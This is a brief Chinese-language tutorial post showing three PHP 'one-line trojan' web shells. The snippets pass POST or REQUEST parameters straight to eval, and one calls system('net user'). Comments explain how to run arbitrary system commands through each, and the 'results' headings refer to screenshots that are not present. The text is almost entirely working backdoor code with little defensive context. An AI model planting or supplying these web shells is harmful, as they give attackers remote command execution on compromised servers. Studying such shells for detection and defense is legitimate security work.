一:
关于PHP的一句话木马:
1 <?php 2
3 $a=$_POST['H']; 4 eval("$a");//eval会将输入的$a作为php语句执行,因此只要对_赋一定的system命令值,就能够执行系统命令 5
6 ?>
显示结果:
二:
关于PHP的一句话木马:
1 <?php 2 $string=@$_POST["_"]; 3 var_dump($string); 4
5 echo "<br>"; 6 eval("system('net user');"); 7
8 ?>
当POST参数_的值为空时:
当不为空时:
三:
使用REQUEST方法:
1 <?php 2
3 @eval($_REQUEST[_]);//什么类型的,如POST,GET均可以接收
4
5 ?>
显示结果:
GET型:
POST型:
